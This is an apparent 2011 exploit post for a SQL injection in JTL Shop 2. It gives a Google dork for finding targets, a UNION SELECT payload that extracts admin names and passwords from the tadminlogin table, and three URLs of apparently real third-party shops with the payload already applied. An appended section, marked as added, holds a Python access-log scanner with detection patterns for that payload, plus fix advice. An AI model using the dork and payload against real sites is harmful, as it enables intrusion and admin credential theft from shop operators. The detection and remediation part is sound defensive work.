Monday, April 4, 2011


JTL Shop 2 Remote SQL Injection Exploit

# Vendor: www.jtl-software.de
# Version: 2

Google dork :
inurl:druckansicht.php?s=  intitle: JTL-Shop2


POC :
druckansicht.php?s=13 and 1=2 union select 1,2,3,4,5,concat(cName,0x3a,cPass),7,8,9 from tadminlogin--

Target Found :

http://test.jtl-shop.de/schlebert/druckansicht.php?s=13%20and%201=2%20union%20select%201,2,3,4,5,concat(cName,0x3a,cPass),7,8,9%20from%20tadminlogin--
http://lifestyle.newco4you.de/druckansicht.php?s=13%20and%201=2%20union%20select%201,2,3,4,5,concat(cName,0x3a,cPass),7,8,9%20from%20tadminlogin--
http://www.tng-equipment.de/JTL-Shop2/druckansicht.php?s=13%20and%201=2%20union%20select%201,2,3,4,5,concat(cName,0x3a,cPass),7,8,9%20from%20tadminlogin--
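
A detection-side view of the PoC above, as an added example that is not part of the original post: it scans web-server access logs for requests to druckansicht.php whose `s` parameter is not a plain integer, and tags those carrying the UNION SELECT / tadminlogin pattern shown in the PoC. The Apache combined log format, the sample log lines, the function names and the rule that legitimate `s` values are integers (inferred from `s=13`) are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (documentation IPs).
SAMPLE_LOG = """\
192.0.2.10 - - [04/Apr/2011:10:00:01 +0200] "GET /druckansicht.php?s=13 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.66 - - [04/Apr/2011:10:00:07 +0200] "GET /druckansicht.php?s=13%20and%201=2%20union%20select%201,2,3,4,5,concat(cName,0x3a,cPass),7,8,9%20from%20tadminlogin-- HTTP/1.1" 200 5301 "-" "Mozilla/5.0"
192.0.2.67 - - [04/Apr/2011:10:00:09 +0200] "GET /JTL-Shop2/druckansicht.php?s=abc HTTP/1.1" 200 5100 "-" "Mozilla/5.0"
192.0.2.11 - - [04/Apr/2011:10:00:12 +0200] "GET /index.php?s=13 HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
INT_RE = re.compile(r"[0-9]+")  # assumption: legitimate s values are plain integers, as in s=13
SQLI_RE = re.compile(r"\bunion\b.+\bselect\b|\btadminlogin\b", re.I | re.S)


def classify(target):
    """Return None for a clean request, else 'sqli' or 'non-integer'."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/druckansicht.php"):
        return None
    # parse_qs percent-decodes values, so %20 and + both become spaces.
    values = parse_qs(parts.query, keep_blank_values=True).get("s", [])
    bad = [v for v in values if not INT_RE.fullmatch(v)]
    if not bad:
        return None
    return "sqli" if any(SQLI_RE.search(v) for v in bad) else "non-integer"


def scan(log_text):
    """Return (client_ip, verdict, request_target) for every flagged line."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m and (verdict := classify(m.group("target"))):
            hits.append((m.group("ip"), verdict, m.group("target")))
    return hits


if __name__ == "__main__":
    for ip, verdict, target in scan(SAMPLE_LOG):
        print(f"{verdict:12} {ip:15} {target}")
```

Because the PoC reads cName and cPass from tadminlogin, a "sqli" hit is a reason to review admin logins that followed it and rotate those credentials. The underlying fix is server-side: handle `s` as an integer and bind it in a parameterized query.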
 
